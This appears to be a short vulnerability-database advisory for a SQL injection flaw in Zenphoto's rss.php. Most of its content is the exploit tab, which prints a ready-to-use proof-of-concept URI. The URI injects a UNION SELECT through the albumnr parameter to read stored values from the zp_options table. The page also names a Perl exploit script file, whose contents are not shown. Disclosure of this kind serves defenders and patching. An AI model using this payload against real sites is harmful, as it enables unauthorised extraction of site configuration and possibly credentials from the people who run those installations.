Zenphoto 'rss.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

Zenphoto 'rss.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI and exploit code are available:

http://www.example.com/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13) ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0/*

/data/vulnerabilities/exploits/27084.pl